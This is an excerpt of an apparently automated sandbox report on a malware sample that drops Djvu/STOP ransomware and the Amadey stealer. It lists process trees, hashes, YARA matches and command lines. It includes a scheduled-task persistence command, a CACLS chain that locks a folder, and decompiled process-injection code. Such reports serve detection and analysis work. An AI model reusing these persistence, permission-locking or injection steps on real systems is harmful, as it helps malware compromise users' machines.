Commandline:	"C:\Users\user\AppData\Local\Temp\5274.exe" --Admin IsNotAutoStart IsNotTask
Imagebase:	0x400000
File size:	842'240 bytes
MD5 hash:	8471A1A3950D0B7A56B8EC23F8201F97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000018.00000002.672529421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000018.00000002.672529421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000018.00000002.672529421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Analysis Process: 5274.exePID: 6836, Parent PID: 7048

General

Target ID:	25
Start time:	20:19:02
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe" --AutoStart
Imagebase:	0x400000
File size:	842'240 bytes
MD5 hash:	8471A1A3950D0B7A56B8EC23F8201F97
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000019.00000002.673436142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000019.00000002.673436142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000019.00000002.673436142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Analysis Process: aafg31.exePID: 5060, Parent PID: 3132

General

Target ID:	26
Start time:	20:19:03
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\Temp\aafg31.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\aafg31.exe"
Imagebase:	0x7ff6d4560000
File size:	247'808 bytes
MD5 hash:	179AF079BC710BD2D1EE6DC5B8A0205C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Fabookie, Description: Yara detected Fabookie, Source: 0000001A.00000003.702112797.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Fabookie, Description: Yara detected Fabookie, Source: 0000001A.00000003.714108073.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Fabookie, Description: Yara detected Fabookie, Source: 0000001A.00000003.708507923.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Fabookie, Description: Yara detected Fabookie, Source: 0000001A.00000003.721198751.0000000000E59000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Fabookie, Description: Yara detected Fabookie, Source: 0000001A.00000003.790895899.0000000000E5B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Fabookie, Description: Yara detected Fabookie, Source: 0000001A.00000003.725519264.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Fabookie, Description: Yara detected Fabookie, Source: 0000001A.00000003.760176887.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Fabookie, Description: Yara detected Fabookie, Source: 0000001A.00000003.734810552.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Fabookie, Description: Yara detected Fabookie, Source: 0000001A.00000003.778651264.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Fabookie, Description: Yara detected Fabookie, Source: 0000001A.00000003.732320393.0000000000E5B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Fabookie, Description: Yara detected Fabookie, Source: 0000001A.00000003.692248111.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Fabookie, Description: Yara detected Fabookie, Source: 0000001A.00000003.706466156.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Fabookie, Description: Yara detected Fabookie, Source: 0000001A.00000003.733256278.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Fabookie, Description: Yara detected Fabookie, Source: 0000001A.00000003.718588900.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Fabookie, Description: Yara detected Fabookie, Source: 0000001A.00000003.774340866.0000000000E5B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Fabookie, Description: Yara detected Fabookie, Source: 0000001A.00000003.704153746.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Fabookie, Description: Yara detected Fabookie, Source: 0000001A.00000003.702521442.0000000000E5B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Fabookie, Description: Yara detected Fabookie, Source: 0000001A.00000003.742156938.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Fabookie, Description: Yara detected Fabookie, Source: 0000001A.00000003.783994033.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Fabookie, Description: Yara detected Fabookie, Source: 0000001A.00000003.793329329.0000000000E5B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 50%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: oldplayer.exePID: 1248, Parent PID: 3132

General

Target ID:	27
Start time:	20:19:03
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\Temp\oldplayer.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\oldplayer.exe"
Imagebase:	0x960000
File size:	202'752 bytes
MD5 hash:	A64A886A695ED5FB9273E73241FEC2F7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001B.00000000.670255361.0000000000961000.00000020.00000001.01000000.00000014.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001B.00000002.675341132.0000000000961000.00000020.00000001.01000000.00000014.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\oldplayer.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 89%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: XandETC.exePID: 5304, Parent PID: 3132

General

Target ID:	28
Start time:	20:19:04
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\Temp\XandETC.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\XandETC.exe"
Imagebase:	0x7ff6530c0000
File size:	3'890'176 bytes
MD5 hash:	3006B49F3A30A80BB85074C279ACC7DF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 71%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: oneetx.exePID: 5148, Parent PID: 1248

General

Target ID:	29
Start time:	20:19:05
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe"
Imagebase:	0x9b0000
File size:	202'752 bytes
MD5 hash:	A64A886A695ED5FB9273E73241FEC2F7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001D.00000000.674614244.00000000009B1000.00000020.00000001.01000000.00000018.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000001D.00000002.802176864.0000000001526000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001D.00000002.801672555.00000000009B1000.00000020.00000001.01000000.00000018.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 89%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: 5274.exePID: 5428, Parent PID: 2148

General

Target ID:	30
Start time:	20:19:06
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe --Task
Imagebase:	0x400000
File size:	842'240 bytes
MD5 hash:	8471A1A3950D0B7A56B8EC23F8201F97
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000001E.00000002.698879485.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000001E.00000002.698879485.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001E.00000002.698879485.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 5308, Parent PID: 5148

General

Target ID:	31
Start time:	20:19:06
Start date:	27/07/2023
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
Imagebase:	0x60000
File size:	185'856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5468, Parent PID: 5308

General

Target ID:	32
Start time:	20:19:06
Start date:	27/07/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625'664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5472, Parent PID: 5148

General

Target ID:	33
Start time:	20:19:06
Start date:	27/07/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "oneetx.exe" /P "user:N"&&CACLS "oneetx.exe" /P "user:R" /E&&echo Y\|CACLS "..\207aa4515d" /P "user:N"&&CACLS "..\207aa4515d" /P "user:R" /E&&Exit
Imagebase:	0xd90000
File size:	232'960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5480, Parent PID: 5472

General

Target ID:	34
Start time:	20:19:07
Start date:	27/07/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625'664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5512, Parent PID: 5472

General

Target ID:	35
Start time:	20:19:07
Start date:	27/07/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Imagebase:	0xd90000
File size:	232'960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cacls.exePID: 5392, Parent PID: 5472

General

Target ID:	36
Start time:	20:19:07
Start date:	27/07/2023
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	CACLS "oneetx.exe" /P "user:N"
Imagebase:	0x1040000
File size:	27'648 bytes
MD5 hash:	4CBB1C027DF71C53A8EE4C855FD35B25
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: oneetx.exePID: 5524, Parent PID: 1088

General

Target ID:	37
Start time:	20:19:07
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe
Imagebase:	0x9b0000
File size:	202'752 bytes
MD5 hash:	A64A886A695ED5FB9273E73241FEC2F7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000025.00000000.678422871.00000000009B1000.00000020.00000001.01000000.00000018.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000025.00000002.680104542.00000000009B1000.00000020.00000001.01000000.00000018.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: cacls.exePID: 5416, Parent PID: 5472

General

Target ID:	38
Start time:	20:19:08
Start date:	27/07/2023
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	CACLS "oneetx.exe" /P "user:R" /E
Imagebase:	0x1040000
File size:	27'648 bytes
MD5 hash:	4CBB1C027DF71C53A8EE4C855FD35B25
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5440, Parent PID: 5472

General

Target ID:	40
Start time:	20:19:08
Start date:	27/07/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Imagebase:	0xd90000
File size:	232'960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cacls.exePID: 5744, Parent PID: 5472

General

Target ID:	41
Start time:	20:19:08
Start date:	27/07/2023
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	CACLS "..\207aa4515d" /P "user:N"
Imagebase:	0x1040000
File size:	27'648 bytes
MD5 hash:	4CBB1C027DF71C53A8EE4C855FD35B25
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cacls.exePID: 5756, Parent PID: 5472

General

Target ID:	43
Start time:	20:19:09
Start date:	27/07/2023
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	CACLS "..\207aa4515d" /P "user:R" /E
Imagebase:	0x1040000
File size:	27'648 bytes
MD5 hash:	4CBB1C027DF71C53A8EE4C855FD35B25
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: 5274.exePID: 5780, Parent PID: 3528

General

Target ID:	44
Start time:	20:19:09
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe" --AutoStart
Imagebase:	0x400000
File size:	842'240 bytes
MD5 hash:	8471A1A3950D0B7A56B8EC23F8201F97
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000002C.00000002.693972740.00000000041B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000002C.00000002.693972740.00000000041B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000002C.00000002.693772578.0000000004028000.00000040.00000020.00020000.00000000.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: file.exePID: 4676, Parent PID: 3528COMMON

Execution Graph

Execution Coverage:	2.9%
Dynamic/Decrypted Code Coverage:	83.9%
Signature Coverage:	46.8%
Total number of Nodes:	62
Total number of Limit Nodes:	2

Executed Functions

Function 00401558 Relevance: 10.7, APIs: 7, Instructions: 206
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E00401558(intOrPtr _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				struct _EXCEPTION_RECORD _v12;
				void* _v16;
				void* _v20;
				char _v44;
				char _v52;
				intOrPtr _v56;
				long _v60;
				char _v64;
				void* _v68;
				char _v72;
				void* _v76;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr _v96;
				char _v100;
				void* __edi;
				intOrPtr _t87;
				struct _EXCEPTION_RECORD _t90;
				intOrPtr _t91;
				struct _GUID _t97;
				struct _GUID _t99;
				long _t100;
				PVOID* _t121;
				PVOID* _t123;
				intOrPtr _t127;
				struct _EXCEPTION_RECORD* _t132;
				void* _t175;
				struct _EXCEPTION_RECORD _t176;
				struct _EXCEPTION_RECORD* _t183;
				intOrPtr* _t184;
				HANDLE* _t185;
				HANDLE* _t186;
				intOrPtr _t199;
				void* _t200;
				intOrPtr* _t201;
				void* _t205;

				_push(0x387);
				_t201 = _t200 + 4;
				_push(0x83);
				L004011F5(_t175, _t205);
				_t127 = _a4;
				_t176 = 0;
				_v56 = 0;
				if(gs != 0) {
					_v56 = _v56 + 1;
				}
				while(1) {
					_t87 =  *((intOrPtr*)(_t127 + 0x48))();
					if(_t87 != 0) {
						break;
					}
					 *((intOrPtr*)(_t127 + 0x1c))(0x3e8);
				}
				_v96 = _t87;
				_t183 =  &_v100;
				 *_t183 = _t176;
				 *((intOrPtr*)(_t127 + 0x4c))(_t87, _t183);
				_t90 =  *_t183;
				if(_t90 != 0) {
					_t132 =  &_v52;
					 *_t132 = _t90;
					 *(_t132 + 4) = _t176;
					_t184 =  &_v44;
					 *((intOrPtr*)(_t127 + 0x10))(_t184, 0x18);
					 *_t184 = 0x18;
					_push( &_v52);
					_push(_t184);
					_push(0x40);
					_push( &_v20);
					if( *((intOrPtr*)(_t127 + 0x70))() == 0 && NtDuplicateObject(_v20, 0xffffffff, 0xffffffff,  &_v16, _t176, _t176, 2) == 0) {
						_v12 = _t176;
						_t97 =  &_v84;
						 *(_t97 + 4) = _t176;
						 *_t97 = 0x5000;
						_t185 =  &_v88;
						if(NtCreateSection(_t185, 6, _t176, _t97, 4, 0x8000000, _t176) == 0) {
							_push(_v84);
							_pop( *_t25);
							_t121 =  &_v72;
							 *_t121 = _t176;
							if(NtMapViewOfSection( *_t185, 0xffffffff, _t121, _t176, _t176, _t176,  &_v60, 1, _t176, 4) == 0) {
								_t123 =  &_v64;
								 *_t123 = _t176;
								if(NtMapViewOfSection( *_t185, _v16, _t123, _t176, _t176, _t176,  &_v60, 1, _t176, 4) == 0) {
									_t199 = _v72;
									 *((intOrPtr*)(_t127 + 0x20))(_t176, _t199, 0x104);
									 *((intOrPtr*)(_t199 + 0x208)) = _a16;
									_v12 = _v12 + 1;
								}
							}
						}
						_t99 =  &_v84;
						 *(_t99 + 4) = _t176;
						 *_t99 = _a12 + 0x10000;
						_t186 =  &_v92;
						_t100 = NtCreateSection(_t186, 0xe, _t176, _t99, 0x40, 0x8000000, _t176);
						if (_t100 != 0) goto L67;
						 *_t100 =  *_t100 + _t100;
					}
				}
				_push(0x15a4);
				_t91 =  *_t201;
				_push(0x83);
				L004011F5(_t176, _t226);
				return _t91;
			}

0x00401578
0x00401580
0x00401592
0x0040159f
0x004015a4
0x004015a7
0x004015a9
0x004015b2
0x004015b4
0x004015b4
0x004015b7
0x004015b7
0x004015bc
0x00000000
0x00000000
0x004018dc
0x004018dc
0x004015c2
0x004015c5
0x004015c8
0x004015cc
0x004015cf
0x004015d3
0x004015d9
0x004015dc
0x004015de
0x004015e1
0x004015e7
0x004015ea
0x004015f8
0x004015f9
0x004015fa
0x004015fc
0x00401602
0x00401625
0x00401628
0x0040162b
0x0040162e
0x00401634
0x00401649
0x0040164b
0x0040164e
0x00401651
0x00401654
0x0040166c
0x0040166e
0x00401671
0x0040168a
0x0040168c
0x00401696
0x0040169c
0x004016a2
0x004016a2
0x0040168a
0x0040166c
0x004016a5
0x004016b1
0x004016b4
0x004016b6
0x004016c6
0x004016cb
0x004016cf
0x004016cf
0x00401602
0x004018ea
0x004018ef
0x00401914
0x00401926
0x0040192f

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000000.00000002.568876219.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 94fb41d671dbeab80d9278360f7b723801272b6da464276eb8e79f9657775aa6
Instruction ID: 4afb5ad6e9f78dbb0f0fc4dd380045413720c66cee1019041566b0107d6eeca4
Opcode Fuzzy Hash: 94fb41d671dbeab80d9278360f7b723801272b6da464276eb8e79f9657775aa6
Instruction Fuzzy Hash: 2F615E71900208FBEB209F91CC49FAF7BB8EF85B14F10412AF912BA1E5D6749901DB66

Uniqueness

Uniqueness Score: -1.00%

Function 00401564 Relevance: 10.7, APIs: 7, Instructions: 175
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00401564(void* __eax, void* __edx, void* __esi) {
				intOrPtr _t89;
				struct _EXCEPTION_RECORD _t92;
				intOrPtr _t93;
				struct _GUID _t99;
				struct _GUID _t101;
				long _t102;
				PVOID* _t123;
				PVOID* _t125;
				intOrPtr _t129;
				struct _EXCEPTION_RECORD* _t135;
				void* _t179;
				struct _EXCEPTION_RECORD _t180;
				struct _EXCEPTION_RECORD* _t190;
				intOrPtr* _t192;
				HANDLE* _t193;
				HANDLE* _t194;
				void* _t207;
				void* _t208;
				void* _t210;
				intOrPtr* _t211;
				void* _t216;

				_t216 = __eax + 0x15a4b8;
				_push(0x387);
				_t211 = _t210 + 4;
				_push(0x83);
				L004011F5(_t179, _t216);
				_t129 =  *((intOrPtr*)(_t208 + 8));
				_t180 = 0;
				 *((intOrPtr*)(_t208 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t208 - 0x34)) =  *((intOrPtr*)(_t208 - 0x34)) + 1;
				}
				while(1) {
					_t89 =  *((intOrPtr*)(_t129 + 0x48))();
					if(_t89 != 0) {
						break;
					}
					 *((intOrPtr*)(_t129 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t208 - 0x5c)) = _t89;
				_t190 = _t208 - 0x60;
				 *_t190 = _t180;
				 *((intOrPtr*)(_t129 + 0x4c))(_t89, _t190);
				_t92 =  *_t190;
				if(_t92 != 0) {
					_t135 = _t208 - 0x30;
					 *_t135 = _t92;
					 *(_t135 + 4) = _t180;
					_t192 = _t208 - 0x28;
					 *((intOrPtr*)(_t129 + 0x10))(_t192, 0x18);
					 *_t192 = 0x18;
					_push(_t208 - 0x30);
					_push(_t192);
					_push(0x40);
					_push(_t208 - 0x10);
					if( *((intOrPtr*)(_t129 + 0x70))() == 0 && NtDuplicateObject( *(_t208 - 0x10), 0xffffffff, 0xffffffff, _t208 - 0xc, _t180, _t180, 2) == 0) {
						 *(_t208 - 8) = _t180;
						_t99 = _t208 - 0x50;
						 *(_t99 + 4) = _t180;
						 *_t99 = 0x5000;
						_t193 = _t208 - 0x54;
						if(NtCreateSection(_t193, 6, _t180, _t99, 4, 0x8000000, _t180) == 0) {
							 *_t25 =  *(_t208 - 0x50);
							_t123 = _t208 - 0x44;
							 *_t123 = _t180;
							if(NtMapViewOfSection( *_t193, 0xffffffff, _t123, _t180, _t180, _t180, _t208 - 0x38, 1, _t180, 4) == 0) {
								_t125 = _t208 - 0x3c;
								 *_t125 = _t180;
								if(NtMapViewOfSection( *_t193,  *(_t208 - 0xc), _t125, _t180, _t180, _t180, _t208 - 0x38, 1, _t180, 4) == 0) {
									_t207 =  *(_t208 - 0x44);
									 *((intOrPtr*)(_t129 + 0x20))(_t180, _t207, 0x104);
									 *((intOrPtr*)(_t207 + 0x208)) =  *((intOrPtr*)(_t208 + 0x14));
									 *(_t208 - 8) =  *(_t208 - 8) + 1;
								}
							}
						}
						_t101 = _t208 - 0x50;
						 *(_t101 + 4) = _t180;
						 *_t101 =  *((intOrPtr*)(_t208 + 0x10)) + 0x10000;
						_t194 = _t208 - 0x58;
						_t102 = NtCreateSection(_t194, 0xe, _t180, _t101, 0x40, 0x8000000, _t180);
						if (_t102 != 0) goto L66;
						 *_t102 =  *_t102 + _t102;
					}
				}
				_push(0x15a4);
				_t93 =  *_t211;
				_push(0x83);
				L004011F5(_t180, _t237);
				return _t93;
			}

0x00401566
0x00401578
0x00401580
0x00401592
0x0040159f
0x004015a4
0x004015a7
0x004015a9
0x004015b2
0x004015b4
0x004015b4
0x004015b7
0x004015b7
0x004015bc
0x00000000
0x00000000
0x004018dc
0x004018dc
0x004015c2
0x004015c5
0x004015c8
0x004015cc
0x004015cf
0x004015d3
0x004015d9
0x004015dc
0x004015de
0x004015e1
0x004015e7
0x004015ea
0x004015f8
0x004015f9
0x004015fa
0x004015fc
0x00401602
0x00401625
0x00401628
0x0040162b
0x0040162e
0x00401634
0x00401649
0x0040164e
0x00401651
0x00401654
0x0040166c
0x0040166e
0x00401671
0x0040168a
0x0040168c
0x00401696
0x0040169c
0x004016a2
0x004016a2
0x0040168a
0x0040166c
0x004016a5
0x004016b1
0x004016b4
0x004016b6
0x004016c6
0x004016cb
0x004016cf
0x004016cf
0x00401602
0x004018ea
0x004018ef
0x00401914
0x00401926
0x0040192f

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000000.00000002.568876219.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 25fb98b4f42f8453298f183ae8c9fe853ab2af685c4accb6617153fec11399dc
Instruction ID: 3c61d4fa49215657d74707620d36eaa57d50516e3f831c539a14d6838cb40392
Opcode Fuzzy Hash: 25fb98b4f42f8453298f183ae8c9fe853ab2af685c4accb6617153fec11399dc
Instruction Fuzzy Hash: 23513CB1900249FBEB209F91CC49FAF7BB8EF85710F14412AF911BA1E5D6749941CB24

Uniqueness

Uniqueness Score: -1.00%

